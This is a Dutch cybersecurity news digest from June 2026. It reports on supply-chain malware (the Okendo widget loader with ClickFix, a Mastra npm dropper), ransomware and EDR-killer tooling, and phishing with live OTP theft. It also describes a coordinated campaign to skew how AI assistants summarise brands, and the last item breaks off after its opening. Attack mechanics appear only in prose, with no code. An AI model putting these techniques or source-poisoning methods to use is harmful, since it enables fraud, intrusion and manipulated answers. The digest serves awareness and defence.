20 juni 2026 | eFAQ documenteert gecoördineerde reputatieaanvallen die AI-systemen beïnvloeden

eFAQ, een platform voor openbare registers en informatie, heeft een gedocumenteerd onderzoek gepubliceerd naar een gecoördineerde campagne voor reputatieaanvallen. Deze campagne was gericht op het beïnvloeden van de merkperceptie in zoekresultaten en de manier waarop AI-assistenten informatie presenteren en samenvatten.

De aanval volgde een herkenbaar patroon. Tientallen accounts, waarvan de meeste dagen voor publicatie waren aangemaakt en kort daarna weer werden verwijderd, plaatsten gelijktijdig bijna identieke beschuldigingen op meerdere platforms, waaronder Reddit, Quora, Facebook en YouTube. De claims betroffen verborgen abonnementen, ongeautoriseerde facturering en problemen met annuleringen. Geen enkele claim bevatte echter ondersteuningstickets, schermafbeeldingen of transactiegegevens. Wat wel consistent was, was de formulering en herhaalde zinsdelen in meerdere berichten, wat resulteerde in zeer vergelijkbare inhoud die op verschillende platforms werd geïndexeerd.

Reddit-moderators verwijderden uiteindelijk een aanzienlijk deel van de inhoud en schorsten de deelnemende accounts onafhankelijk. Deze handhaving kwam niet van het juridische team van eFAQ, maar van de platforms zelf nadat de inhoud was beoordeeld op basis van hun authenticiteits- en moderatiebeleid.

Het onderzoek toonde aan dat de daadwerkelijke aankoopprocedure van eFAQ de claims tegensprak. Voordat een betaling wordt voltooid, krijgen gebruikers de abonnementsvoorwaarden, prijzen en verlengingsvoorwaarden te zien op een speciaal scherm. Een verplicht toestemmingsvakje moet actief worden aangevinkt voordat de transactie verdergaat. De voorwaarden worden meerdere keren gepresenteerd voorafgaand aan de betalingsbevestiging. Accounts die deze voorwaarden als "verborgen" beschreven, hadden ofwel geen aankoop voltooid, of waren geen geverifieerde klanten. Annuleringsdocumentatie is openbaar beschikbaar op efaq.com en terugbetalingsverzoeken worden afgehandeld via standaard klantenservicekanalen; geen van beide processen is beperkt of verhuld.

Bij een verbreding van de analyse buiten de inhoud die specifiek over eFAQ ging, ontdekten onderzoekers vergelijkbare accountclusters in campagnes die zich richtten op andere, niet-gerelateerde bedrijven. Dit suggereerde dat het netwerk niet voor één enkel doelwit was gebouwd, maar dat eFAQ deel uitmaakte van een breder patroon. De operationele logica hierachter is eenvoudig: publiceer grote hoeveelheden negatieve inhoud op platforms die al worden vertrouwd door zoekmachines en AI-systemen, zodat die inhoud kan worden geïndexeerd en getoond in zoekresultaten, AI Overviews en LLM-reacties. De aanvallers hoeven geen autoriteit op te bouwen; de platforms bieden deze via aggregatie.

Voor AI-ontdekking betekent dit dat AI-assistenten, zoals ChatGPT, Gemini, Perplexity en Google AI Overviews, putten uit dezelfde geïndexeerde webbronnen. Wanneer voldoende gecoördineerde inhoud een merk op een consistente manier beschrijft, kan dit de manier beïnvloeden waarop deze systemen dat merk samenvatten. Deze systemen verifiëren claims niet onafhankelijk; ze weerspiegelen patronen in de beschikbare gegevens. Het onderzoek van eFAQ is een van de gedocumenteerde gevallen waarin een bedrijf een reputatiecampagne gedurende zijn levenscyclus heeft geanalyseerd, inclusief accountcreatie en gecoördineerde publicatie, amplificatie via meerdere platforms (waaronder promotienetwerken voor casino en crypto), zoekindexering en potentiële AI-systeembeïnvloeding, en handhavingsacties door de platforms als ondersteunende signalen. De bevinding is niet dat dit theoretisch mogelijk is, maar dat het patroon daadwerkelijk is waargenomen en gedocumenteerd.

eFAQ, een onderdeel van DataX Group, brengt voertuiggeschiedenis, eigendomsgegevens, persoonsgegevens en achtergrondinformatie samen in één product. Het bedrijf publiceerde dit onderzoek om de waargenomen tactieken en patronen te documenteren die van invloed zijn op online informatie-ecosystemen.

 

Bron: eFAQ

20 juni 2026 | Schaduw AI: Van datalekken naar kritiek probleem met toegangscontrole

De aanvankelijke zorgen over de integratie van artificiële intelligentie (AI) in bedrijfsprocessen richtten zich voornamelijk op datalekken, waarbij werknemers per ongeluk gevoelige informatie in publieke AI tools plakten. Beveiligingsteams reageerden hierop met gebruiksbeleid, domeinblokkades en regels voor dataverliespreventie (DLP). Deze aanpak was destijds passend, maar voldoet niet langer aan de verschuivende aard van de dreiging.

Schaduw AI is geëvolueerd van een datalekprobleem naar een complex probleem met toegangscontrole. De kern van de dreiging ligt niet langer in wat werknemers in AI tools typen, maar in welke AI-agenten binnen de organisatie actief zijn, met welke bedrijfssystemen zij verbonden zijn en welke acties zij wel of niet mogen uitvoeren.

Werknemers en bedrijfsonderdelen ontwikkelen in hoog tempo AI-agenten, zoals aangepaste assistenten, codeeragenten, workflowautomatiseringen en agentische applicaties. Deze worden gecreëerd via goedgekeurde platforms, maar ook via browserextensies, SaaS-native functies, ontwikkelaarstools, MCP-servers, op endpoints gebaseerde agenten en aangepaste scripts. Vele beginnen als snelle experimenten en worden binnen enkele dagen ingebed in kritieke bedrijfsprocessen.

Het risicoprofiel van deze AI-agenten verschilt fundamenteel van traditionele schaduw IT. Waar een niet-goedgekeurde SaaS-applicatie een bestemming is voor data, is een AI-agent een actieve entiteit die API's kan aanroepen, opgeslagen referenties kan gebruiken, records kan ophalen, configuraties kan wijzigen, downstream workflows kan activeren en acties kan uitvoeren in productiesystemen. Dit gebeurt vaak zonder expliciete menselijke autorisatie voor elke stap. Een werknemer die klantgegevens in een publieke AI tool plakt, is een incident van datalekken. Een aangepaste AI-agent die is verbonden met Salesforce, Snowflake, GitHub, Gong en Slack, is een incident met toegangscontrole dat kan leiden tot het blootstellen, lezen, schrijven en verwijderen van gegevens. Dergelijke agenten kunnen bovendien draaien op serviceaccounts met niet-gecontroleerde machtigingen en maandenlang actief blijven nadat de werknemer die ze heeft gebouwd van rol is veranderd of het bedrijf heeft verlaten. Nieuw onderzoek van Token Security en de Cloud Security Alliance toont aan hoe wijdverspreid deze blootstelling is geworden.

De meeste bestaande beveiligingscontroles zijn ontworpen voor menselijke identiteiten en deterministische workloads. IAM-beleid, DLP-regels en netwerkmonitoring gaan uit van voorspelbaar gedrag en gedefinieerde toegangspaden. AI-agenten doorbreken deze aannames. Een agent die is belast met het oplossen van een mislukte implementatie, kan logs lezen, monitoringsystemen bevragen, infrastructuurconfiguraties wijzigen, tickets openen, automatiseringspijplijnen activeren en engineeringteams op de hoogte stellen, allemaal in sequentie en allemaal met dezelfde overgeërfde referenties. Om workflows niet te verstoren, verlenen ontwikkelaars vooraf brede machtigingen, die vervolgens accumuleren. Agenten erven privileges op het niveau van de maker, tijdelijke toegang wordt permanent en beveiligings- en identiteitsteams verliezen het overzicht van wat deze identiteiten daadwerkelijk doen.

Het blokkeren van publieke AI-domeinen lost dit probleem niet op. Tegen de tijd dat een agent referenties heeft voor bedrijfssystemen, is de grens al overschreden. De oplossing ligt in geautomatiseerde remediëring van niet-menselijke identiteiten.

Een effectieve inventaris van schaduw AI vereist het controleren van alle omgevingen waar agenten actief zijn, zoals AI-platforms, SaaS-applicaties met ingebouwde automatisering, cloudaccounts, ontwikkelaarstools, endpoints en identiteitsproviders. Zes cruciale vragen helpen beveiligingsteams om echte controle te krijgen:

1.  Waar worden agenten gecreëerd of geïnstalleerd? Dit omvat AI-platforms, maar ook codeerassistenten, SaaS-native agentfuncties, lokale ontwikkelaarstools en interne applicaties die AI-mogelijkheden hebben toegevoegd.

2.  Wie is de eigenaar van elke agent en wie kan deze gebruiken? Zonder eigenaarschap is er geen verantwoording. Een agent die is gebouwd voor een klein financieel team en vervolgens binnen de hele organisatie wordt gedeeld, heeft een heel ander risicoprofiel dan een agent die is beperkt tot één gebruiker.

3.  Met welke bronnen en services is de agent verbonden? Een agent kan op platformniveau onschadelijk lijken, maar verbindingen hebben met gevoelige databases of productiesystemen via informeel verleende en nooit gecontroleerde referenties.

4.  Welke identiteiten en geheimen gebruikt de agent? Agenten authenticeren via serviceaccounts, API-sleutels, OAuth-tokens, cloud IAM-rollen en langdurige geheimen, elk met verschillende risico's.

5.  Wat is de intentie van de agent en wat heeft deze daadwerkelijk gedaan? Alleen de configuratie toont niet aan of een agent gegevens leest, records schrijft of systemen buiten het beoogde bereik benadert. Inzicht in de intentie en gedragscontext is essentieel voor het prioriteren van een reactie.

6.  Is de agent nog actief? Gegevens van Token Security's Agentic Pulse toonden aan dat 65,4% van de agentische chatbots sinds hun creatie nooit is gebruikt, maar dat hun referenties actief blijven. Dormante agenten met live toegang vormen een aanhoudende en onderschatte blootstelling.

De meeste organisaties staan aan het begin van deze ontwikkeling en hebben weinig tot geen inventaris van AI-agenten. De volgende stap is het verkrijgen van gedeeltelijke zichtbaarheid om te weten welke agenten bestaan, zelfs zonder volledige context. Daarna is verrijking en context nodig om de intentie te begrijpen en eigenaarschap, toegang en referenties aan elke agent te koppelen. De laatste stap is het toepassen van handhaving met geautomatiseerde controles die buitensporige machtigingen remediëren, eigenaren van inactieve agenten op de hoogte stellen en nieuwe agenten die verbinding maken met gevoelige systemen markeren.

Het doel is niet om de adoptie van AI te blokkeren. Teams staan onder druk om deze tools te gebruiken en veel van de productiviteitswinsten zijn legitiem. Als beveiliging een harde blokkering wordt, zal het gebruik verder ondergronds en ongezien plaatsvinden. De betere uitkomst is beheerde facilitering, waarbij teams de mogelijkheid krijgen om agenten te implementeren met geautomatiseerde controles die continu op de achtergrond draaien. Dit vereist dat AI-agenten op dezelfde manier worden behandeld als elke andere identiteit binnen de onderneming, met continue monitoring.

 

Bron: Schaduw AI

20 juni 2026 | Hackers misbruiken Okendo reviews script voor SmartApeSG malware campagne

Een recent ontdekte supply chain aanval heeft duizenden e-commerce websites in gevaar gebracht, nadat een populaire reviews widget van een derde partij heimelijk werd ingezet als tool voor het verspreiden van malware. De dreigingsactoren achter de SmartApeSG-campagne hebben kwaadaardige JavaScript geïnjecteerd in de Okendo Reviews widget, een platform dat door meer dan 18.000 merken wereldwijd wordt gebruikt. Dit stelde hen in staat om malware te verspreiden onder onwetende bezoekers van online winkels.

De aanval ontvouwde zich stilzwijgend, wat betekende dat bezoekers van de getroffen online winkels geen idee hadden dat een script op de pagina hun systeem scande en zich voorbereidde op het leveren van kwaadaardige inhoud. De Okendo widget wordt doorgaans ingebed op drukbezochte pagina's, waaronder store homepages, productpagina's en formulieren voor het indienen van recensies, waardoor het een ideaal compromitteringspunt is voor aanvallers die een breed publiek willen bereiken.

Analisten van Zscaler ThreatLabz ontdekten deze activiteit voor het eerst op 14 mei 2026, toen zij een ongebruikelijke toename in verkeer opmerkten dat gekoppeld was aan de SmartApeSG-dreigingsactor. Zscaler verklaarde in een rapport dat hun team kwaadaardige code vond die verborgen zat in het legitieme widget script. De aanval vertegenwoordigde een duidelijke supply chain compromittering die elke site die de widget gebruikt, kon treffen.

SmartApeSG, ook bekend onder de namen ZPHP en HANEYMANEY, is geen onbekende in het dreigingslandschap. De groep is in het verleden gekoppeld aan campagnes die gevaarlijke tools leverden, waaronder NetSupport RAT, Remcos RAT, StealC en Sectop RAT. Dit zijn programma's die aanvallers in staat stellen om op afstand controle te krijgen over de computer van een slachtoffer of gevoelige gegevens zoals wachtwoorden en financiële inloggegevens te stelen.

Na de ontdekking rapporteerde ThreatLabz het incident direct aan Okendo, en het bedrijf bevestigde dat het op de hoogte was van het probleem. Okendo handelde snel en herstelde het widget script naar een schone staat, waardoor de actieve dreiging werd gestopt. De periode waarin het kwaadaardige script live was, kan echter lang genoeg zijn geweest om een aanzienlijk aantal bezoekers op veel websites bloot te stellen.

De aanvallers kozen hun doelwit zorgvuldig. Door een veelgebruikte widget van een derde partij te compromitteren in plaats van individuele websites, vergrootten zij hun bereik dramatisch zonder elke site afzonderlijk te hoeven binnendringen. Het kwaadaardige JavaScript fungeerde als een staged loader, wat betekent dat het niet al zijn acties tegelijk uitvoerde. In plaats daarvan bewoog het stap voor stap, waarbij het de omgeving controleerde voordat het aanvullende inhoud binnenhaalde.

Het script gebruikte tracking via de browser via localStorage om herhaalde uitvoering op hetzelfde apparaat te voorkomen. Het controleerde ook de User-Agent string van de bezoeker om mobiele gebruikers eruit te filteren en zich te richten op desktops, aangezien latere stadia van de aanval afhankelijk waren van Windows-gebaseerde interacties. Nadat deze controles waren doorstaan, gebruikte het script een XOR-gebaseerde decoderingsroutine om stilletjes een verborgen URL te reconstrueren, die het vervolgens als een nieuw scriptelement laadde om de volgende fase op te halen.

Slachtoffers die deze filters passeerden, kregen een valse CAPTCHA of een verificatiescherm te zien, een techniek die bekendstaat als ClickFix. Deze prompts instrueerden gebruikers om het Windows Uitvoeren-menu te openen en een commando te plakken dat al stilzwijgend naar hun klembord was gekopieerd. Dat commando downloadde vervolgens een PowerShell-script of HTML Application-bestand, dat een tool voor externe toegang of een informatiedief op de machine van het slachtoffer installeerde.

De omvang van deze aanval is moeilijk te negeren. ThreatLabz observeerde de gecompromitteerde widget op websites variërend van middelgrote online winkels tot grote retailmerken. Verkeersschattingen voor getroffen sites varieerden van ongeveer 150.000 tot enkele miljoenen maandelijkse bezoekers, en een getroffen Amerikaans retailmerk alleen al trekt ongeveer 7 miljoen bezoekers per maand. Op 14 mei 2026 alleen al registreerde het platform van Zscaler bijna 15.000 blokkades die verband hielden met SmartApeSG op één dag, wat de intensiteit van de campagne op zijn hoogtepunt weerspiegelt. Hoewel deze cijfers geblokkeerde pogingen vertegenwoordigen en geen bevestigde infecties, benadrukken ze hoe snel een supply chain compromittering zich kan verspreiden wanneer een populaire leverancier wordt aangevallen. Website-eigenaren die afhankelijk zijn van scripts van derden, moeten hun integraties controleren en nauwlettend letten op onverwacht gedrag op hun pagina's.

 

Bron: Zscaler

20 juni 2026 | Hackers misbruiken WK 2026 met neppe ticketsites en live OTP-interceptie

Met de FIFA Wereldbeker 2026-wedstrijden in volle gang, waarschuwen beveiligingsonderzoekers voor cybercriminelen die voetbalfans wereldwijd met diverse oplichtingspraktijken bestoken. Deze criminelen proberen te profiteren van de populariteit van het toernooi. Meerdere scam netwerken zijn ontdekt door beveiligingsbedrijven, waaronder Forcepoint X-Labs, CloudSEK en Netcraft. Deze netwerken zijn specifiek ontworpen om geld en persoonlijke gegevens te stelen van mensen die op zoek zijn naar tickets, hotelaccommodaties en gokmogelijkheden.

Beveiligingsonderzoeker Prashant Kumar en zijn team bij Forcepoint X-Labs hebben deze dreigingen nauwlettend gevolgd. Kumar verklaarde dat hij een grote, actieve, multi-variant phishing- en fraudecampagne heeft waargenomen die misbruik maakt van het merk FIFA Wereldbeker 2026. Het team identificeerde meer dan honderd neppe weblinks die drie hoofdtypes van oplichting verspreiden. De grootste operatie lokt fans naar illegale gokplatformen die gekoppeld zijn aan lopende wedstrijden, via frauduleuze links zoals cn-web-fifacwc.com en zone-2026fifa.com.

Hoewel deze links Chinese taaltekst bevatten, zijn er ook op maat gemaakte versies voor internationale doelgroepen in onder andere Frankrijk, Afrika en Azië. Bezoekers worden gelokt met beloftes van gegarandeerde beloningen voor het plaatsen van weddenschappen op actuele wedstrijden. In werkelijkheid worden zij echter omgeleid naar pagina's die gericht zijn op het stelen van inloggegevens.

Andere cybersecuritybedrijven, zoals CloudSEK en Netcraft, ontdekten dat deze operaties zeer georganiseerd zijn. CloudSEK traceerde de hoofdopzet naar dreigingsactoren in China, die een ongeautoriseerd betalingscontrolepaneel genaamd tbpay.uk gebruiken. Om de pagina's authentiek te laten lijken, embedden de hackers zelfs een legitieme live chatdienst, tawk.to, om met slachtoffers te communiceren.

Terwijl fans zich haasten om zitplaatsen voor aankomende wedstrijden te bemachtigen, maken deze oplichters gebruik van realistische online afrekenpagina's op links zoals ww-fifa.com. Ze stelen niet alleen kaartnummers voor toekomstig gebruik. In plaats daarvan gebruiken ze een live setup om in realtime te observeren wat het slachtoffer op de pagina doet. Wanneer de bank een sms-bericht met een beveiligingscode, een zogenaamd eenmalig wachtwoord (OTP), verzendt, vangen de oplichters dit op zodra het wordt ingevoerd. Dit stelt hen in staat om de beveiligingscontrole van de bank te omzeilen en het account van het slachtoffer volledig te kapen.

Forcepoint heeft bevestigd dat het actief deze bevestigde neppe sites en hun gedeelde backend systemen blokkeert, en voortdurend nieuwe regels schrijft om de lookalike weblinks te stoppen die oplichters elke dag tijdens het toernooi creëren.

 

Bron: CloudSEK | Bron 2: netcraft.com

21 juni 2026 | Spotify misbruikt voor tienduizenden nep podcasts die leiden naar illegale drugssites

Criminelen hebben op grote schaal misbruik gemaakt van het platform Spotify door tienduizenden nep podcasts te uploaden. Deze shows waren niet bedoeld om te worden beluisterd, maar dienden als een sluw lokmiddel om zoekmachines te manipuleren. Het uiteindelijke doel was om gebruikers naar illegale online apotheken en diverse oplichtingssites te loodsen.

Deze grootschalige praktijk is aan het licht gekomen door een kritisch rapport van het Amerikaanse Congres, dat openbaar is gemaakt door senator Maggie Hassan. Het rapport benadrukt hoe cybercriminelen innovatieve methoden toepassen om hun illegale activiteiten te promoten en argeloze internetgebruikers te misleiden. Door een enorm volume aan nep content te creëren en te publiceren op een populair streamingplatform als Spotify, proberen de criminelen de algoritmes van zoekmachines te beïnvloeden. Dit vergroot de zichtbaarheid van hun frauduleuze websites, waardoor ze een breder publiek kunnen bereiken met hun illegale aanbiedingen, variërend van ongereguleerde medicijnen tot pure oplichting. De bevindingen onderstrepen de constante uitdaging voor online platforms om misbruik te detecteren en te bestrijden, en voor gebruikers om waakzaam te blijven voor verdachte links en aanbiedingen.

 

Bron: U.S. Congress

21 juni 2026 | Nieuwe Prinz Eugen ransomware prioriteert recent gewijzigde bestanden

Een nieuwe ransomware-operatie, genaamd ‘Prinz Eugen’, is ontdekt die zich richt op het versleutelen van recent gewijzigde bestanden en geen losgeldbrief op het systeem achterlaat. Onderzoek door Threatdown, de enterprise cybersecurity-tak van Malwarebytes, toont aan dat de Prinz Eugen-hackers een "hands-on-keyboard" aanpak hanteren en de voorkeur geven aan legitieme remote monitoring en management (RMM) software en living-off-the-land tools.

De initiële toegang wordt waarschijnlijk verkregen via gestolen RDP-referenties, waarna de hoofd-payload, 'servertool.exe', handmatig wordt gedownload en uitgevoerd. Bij een onderzocht incident observeerden de onderzoekers het gebruik van de RemotePC RMM-tool en een backdoor-beheerdersaccount voor persistentie. In tegenstelling tot veel moderne afpersingsoperaties werkt Prinz Eugen niet volgens het ransomware-as-a-service (RaaS) model en werft het momenteel geen affiliates. De data leak site van de dreigingsactor vermeldt momenteel slechts drie slachtoffers, waarbij de hackers zich bezighouden met data-encryptie, exfiltratie of beide. De cybersecurity-gemeenschap is echter op de hoogte van meer organisaties die zijn getroffen. Standard Bank in Zuid-Afrika, een van de geïdentificeerde slachtoffers, weigerde een geëiste losgeld van 1 BTC te betalen.

Een analyse van een Prinz aanval met Eugen onthulde dat de Go-gebaseerde malware de encryptie van de meest recent gewijzigde bestanden prioriteert. Wanneer meerdere bestanden dezelfde tijdstempel delen, worden ze in alfabetische volgorde verwerkt. Threatdown-onderzoekers vermoeden dat deze aanpak bedoeld is om de impact op slachtoffers te maximaliseren door bestanden te targeten die waarschijnlijk bedrijfskritisch en actief in gebruik zijn, waardoor de druk om losgeld te betalen toeneemt. Het geanalyseerde sample controleert recursief directories zonder dieptelimiet en zonder uitsluitingen, en versleutelt vrijwel elk bestand, behalve die met de .prinzeugen-extensie, die Prinz Eugen gebruikt voor versleutelde bestanden.

De ransomware maakt gebruik van ChaCha20-Poly1305-encryptie met een 32-byte hoofdsleutel, een willekeurige initialisatievector voor elk bestand en een sleutelafleidingsfunctie gebaseerd op Argon2id, SHA-256 en HKDF-SHA256. Het encryptieproces wordt uitgevoerd in delen van 1 MB en de bestandsintegriteit wordt gecontroleerd met behulp van de SHA-256-hashfunctie. De onderzoekers merkten op dat wanneer de malware de --delete-vlag gebruikt om het originele bestand na encryptie te verwijderen, er een controle plaatsvindt om ervoor te zorgen dat het bestand kan worden gedecodeerd voordat het van het systeem wordt verwijderd. Om te voorkomen dat de encryptiesleutel wordt teruggevonden, overschrijft Prinz Eugen ransomware deze met nullen, dwingt het garbage collection af om deze uit het geheugen te verwijderen en verwijdert het zichzelf vervolgens van de schijf.

Analyse van de encryptor toonde geen functionaliteit om een tekstuele losgeldbrief achter te laten of de bureaubladachtergrond te wijzigen. Threatdown-onderzoekers stellen dat de afwezigheid van een losgeldbrief "een tactiek is die we vaker zien bij georganiseerde ransomwaregroepen." Dit wordt doorgaans gedaan om de forensische footprint te verkleinen en het moeilijker te maken om de afpersingsfase automatisch te detecteren. Door losgeldcommunicatie volledig out-of-band te verplaatsen (via directe e-mail, telefonisch contact of slachtofferportalen op het darkweb), vermindert de actor forensische artefacten en compliceert het de geautomatiseerde detectie van de afpersingsfase. Threatdown’s rapport biedt een lijst met Indicators of Compromise (IOCs) om organisaties en onderzoekers te helpen bij het analyseren, detecteren en verdedigen tegen Prinz Eugen-aanvallen met ransomware.

 

Bron: Threatdown | Bron 2: standardbank.co.za | Bron 3: hubs.li

21 juni 2026 | Microsoft koppelt Mastra AI supply chain aan Noord-Koreaanse hackers

Microsoft heeft een recente supply chain aanval op Mastra AI, waarbij meer dan 140 npm pakketten werden gecompromitteerd, toegeschreven aan de Noord-Koreaanse hackergroep Sapphire Sleet, ook bekend als BlueNoroff. Deze conclusie volgt op een eerdere melding van Microsoft deze week, waarin werd bekendgemaakt dat aanvallers een npm maintainer account hadden gekaapt om kwaadaardige pakketupdates te publiceren. Microsoft stelt met grote zekerheid dat deze activiteit kan worden toegeschreven aan Sapphire Sleet, een door de Noord-Koreaanse staat gesponsorde actor die zich voornamelijk richt op de financiële sector.

De aanval begon toen dreigingsactoren het npm maintainer account genaamd "ehindero" compromitteerden. Dit account had publicatierechten binnen de Mastra pakket omgeving. De aanvallers gebruikten dit account om kwaadaardige updates te publiceren voor meer dan 140 pakketten binnen de @mastra scope. Deze updates injecteerden een kwaadaardige afhankelijkheid genaamd "easy-day-js", een typosquat van de legitieme en veelgebruikte JavaScript bibliotheek dayjs.

Zodra de gecompromitteerde pakketten werden geïnstalleerd, activeerde de kwaadaardige afhankelijkheid een post-install hook die een malware dropper op de apparaten van ontwikkelaars installeerde. Het uiteindelijke doel van deze malware was het stelen van gevoelige inloggegevens, API sleutels, authenticatie tokens en cryptocurrency wallets. Microsoft legt uit dat "easy-day-js" na installatie een geobfusceerd dropper script uitvoerde, de Transport Layer Security (TLS) certificaatverificatie uitschakelde, contact opnam met door aanvallers gecontroleerde command-and-control (C2) infrastructuur, een tweede-fase payload downloadde en deze als een losgekoppeld, verborgen proces uitvoerde.

De gedownloade tweede-fase payload was een cross-platform informatie steler, specifiek ontworpen om systemen met Windows, Linux en macOS te treffen. Dit implantaat verzamelde informatie over de host, browsergeschiedenis, geïnstalleerde applicaties en draaiende processen. Het controleerde tevens of 166 cryptocurrency wallet browser extensies waren geïnstalleerd, waaronder MetaMask, Phantom, Coinbase Wallet, Binance Wallet en TronLink. De malware maakte gebruik van verschillende persistentie methoden, afhankelijk van het besturingssysteem, zoals Windows Registry Run keys, macOS LaunchAgents en Linux systemd services.

Microsoft meldt dat systemen die communiceerden met de command-and-control servers van de aanvallers, verdere activiteiten vertoonden die eerder zijn geassocieerd met Sapphire Sleet. Dit omvat de implementatie van een PowerShell backdoor die eerder door de groep is gebruikt, aanvullende persistentie mechanismen, Microsoft Defender uitsluitingen en een kwaadaardige Windows service die SYSTEM privileges verleende. De PowerShell backdoor, de gebruikte werkwijze en de C2 infrastructuur zijn door Sapphire Sleet in eerdere campagnes ingezet. Sapphire Sleet staat bekend als een door de Noord-Koreaanse staat gesponsorde dreigingsactor, berucht om campagnes voor diefstal van cryptocurrency, kwaadaardige browser extensies, nep-vacature aanbiedingen en software supply chain compromitteringen gericht op het stelen van inloggegevens en cryptocurrency activa. Microsoft stelt dat de groep ook verantwoordelijk was voor een afzonderlijke npm supply chain aanval op de Axios HTTP client in april 2026.

 

Bron: Microsoft | Bron 2: hubs.li

22 juni 2026 | Onderzoek onthult werkwijze van hackersgroep Gentlemen, actief in West-Europa

Cybersecurity bedrijf ESET heeft de werkwijze van de criminele hackersgroep Gentlemen blootgelegd. Deze groep, die eind 2025 begon en in het eerste kwartaal van 2026 uitgroeide tot een van de meest actieve wereldwijd, onderscheidt zich door de ontwikkeling van eigen tools, de zogenaamde EDR killers. Deze specifieke tools zijn ontworpen om antivirus en detectie software van bedrijven uit te schakelen, wat Gentlemen een voordeel geeft ten opzichte van veel andere ransomware groepen die hun affiliates doorgaans zelf dergelijke tools laten zoeken.

Gentlemen opereert volgens het ransomware as a service model (RaaS), waarbij ze hun malware verhuren aan affiliates. Deze affiliates voeren de daadwerkelijke aanvallen uit en behouden 90 procent van het losgeld. De groep past bovendien dubbele afpersing toe: slachtoffers die weigeren te betalen, zien hun data niet alleen versleuteld, maar riskeren ook publicatie van de gestolen informatie online.

ESET heeft acht varianten van GentleKiller geïdentificeerd, het interne framework van de groep. Elke variant vermomt zich als een legitiem product en maakt misbruik van een ander kwetsbaar of kwaadaardig stuurprogramma. Naast hun eigen ontwikkelingen maakt Gentlemen ook gebruik van software van andere criminele entiteiten, waaronder HexKiller, ThrottleBlood en HavocKiller.

Een intern datalek bij Gentlemen in mei 2026 gaf ESET een uniek inzicht in de interne praktijken van de groep. Volgens Jakub Souček, onderzoeker bij ESET, hebben eerdere rapporten over Gentlemen zich niet gedetailleerd gericht op de EDR killers van de groep. Dankzij de aanhoudende zichtbaarheid op incidentniveau kon ESET een diepgaande analyse uitvoeren van de ontwikkelingspraktijken.

De aanvallers hanteren een consistente strategie om hun tools onopvallend te houden. Ze geven hun software namen van bestaande softwareleveranciers en gebruiken vervalste certificaten en logo's. Bovendien blijkt de bende in staat om recent bekendgemaakte beveiligingslekken zeer snel uit te buiten, soms al binnen enkele dagen na de officiële publicatie. De focus van Gentlemen ligt niet primair op Amerikaanse slachtoffers, maar verspreidt zich over Zuidoost-Azië, Zuid-Amerika en West-Europa, wat de dreiging ook voor Nederlandse en Belgische organisaties relevant maakt. Het begrijpen van de werking van GentleKiller stelt verdedigers in staat hun strategieën te verbeteren en zich te wapenen tegen toekomstige uitbreidingen van het arsenaal van Gentlemen.

 

Bron: ESET

22 juni 2026 | INTERPOL waarschuwt voor sterke toename cybercriminaliteit in Azië-Pacific

Een nieuw rapport van INTERPOL onthult een "dramatische toename" van cybercriminaliteit in Azië en de Stille Oceaan. Deze groei wordt aangewakkerd door snelle digitalisering, hogere internetpenetratie, de opkomst van nieuwe technologieën, de aanwezigheid van georganiseerde criminele netwerken en een verschil in de volwassenheid van cybersecurity in de regio.

Volgens INTERPOL's '2025/2026 Asia and South Pacific Cyberthreat Assessment Report' is phishing de meest wijdverspreide en financieel schadelijke vorm van cybercriminaliteit geworden. Een derde van de landen in de regio rapporteerde tussen januari 2024 en maart 2025 meer dan 10.000 gevallen. In totaal heeft meer dan de helft van de INTERPOL-lidstaten gemeld dat cybercriminaliteit minstens 30% van alle nationaal geregistreerde misdrijven uitmaakt.

Neal Jetton, INTERPOL Cybercrime Director, verklaarde dat de bevindingen in dit rapport een snel evoluerend cyberdreigingslandschap in Azië en de Stille Oceaan benadrukken. Cybercriminelen maken op industriële schaal gebruik van kunstmatige intelligentie (AI), ransomware-as-a-service modellen en geavanceerde social engineering-technieken. Nu de digitale adoptie in de regio versnelt, blijft het versterken van operationele samenwerking, informatie-uitwisseling en cyberweerbaarheid essentieel voor de bescherming van gemeenschappen en kritieke infrastructuur.

De toenemende verfijning van de werkwijzen van cybercriminelen heeft geleid tot een stijging van ransomware aanvallen, evenals deepfake en door AI gedreven oplichting. Deze omvatten het imiteren van bedrijfsleiders om frauduleuze transacties te autoriseren. Naar schatting werden in 2024 meer dan 135.000 ransomware-gerelateerde aanvallen in de regio geregistreerd. Een overgrote meerderheid van deze incidenten trof de vastgoed-, productie- en financiële dienstensector. Ransomware-groepen misbruiken ook de wettelijke verplichtingen van bedrijven om de druk tijdens afpersingspogingen op te voeren.

Dit wordt aangevuld door de industrialisering van digitale oplichtingspraktijken door transnationale georganiseerde misdaadsyndicaten in landen zoals Cambodja, Laos, Myanmar en de Filippijnen. Deze syndicaten hebben uitgebreide oplichtingscentra opgezet waar dwangarbeid wordt ingezet om investeringsfraude te plegen, waarbij mensen over de hele wereld worden misleid na het opbouwen van vriendschappelijke of romantische relaties. INTERPOL meldde dat georganiseerde misdaad in Myanmar, Cambodja en Laos deepfakes gebruikte in 'romance oplichting', waarbij AI-persona's en social engineering werden gecombineerd, wat resulteerde in 37 miljard dollar aan regionale cybercriminele verliezen.

Andere regionale trends die in het rapport worden genoemd, zijn onder meer:

- Banktrojans en informatie-stealers zijn de op één na meest voorkomende vorm van cybercriminaliteit, met malwarefamilies zoals RedLine, Lumma, LokiBot, Negasteal en ZBot bovenaan de lijst.

- Maandelijks klikte 5,5 op elke 1.000 individuen in de Azië- en Stille Oceaan-regio op phishinglinks, bijna het dubbele van het wereldwijde gemiddelde van 2,9 per 1.000.

- Distributed denial-of-service (DDoS)-aanvallen stegen in 2024 met 92% vergeleken met het voorgaande jaar.

- Systeemintrusies waren verantwoordelijk voor ongeveer 80% van alle datalekken in 2024.

- Het gebruik van deepfake technologie voor seksuele uitbuiting, chantage of dwang.

- Misbruik van verkeerd geconfigureerde systemen, zwakke encryptie, onveilige API's en onvoldoende monitoring om doelnetwerken binnen te dringen.

In reactie hierop schalen wetshandhavingsorganisaties in de regio – ondersteund door INTERPOL – hun gezamenlijke inspanningen op om cybercriminaliteit te bestrijden. Dit omvat de coördinatie van operaties tegen cybercriminele infrastructuur, gezamenlijke onderzoeken, gespecialiseerde trainingsinitiatieven en de ontwikkeling van beleid om de cyberweerbaarheid te verbeteren.

 

Bron: INTERPOL | Bron 2: trendmicro.com | Bron 3: netskope.com

22 juni 2026 | Fortinet waarschuwt voor actieve credential harvesting campagne

Fortinet heeft een dringende beveiligingswaarschuwing uitgegeven aan klanten over een lopende campagne voor het oogsten van inloggegevens, genaamd "FortiBleed" door dreigingsonderzoekers. Deze campagne is gericht op FortiGate-apparaten.

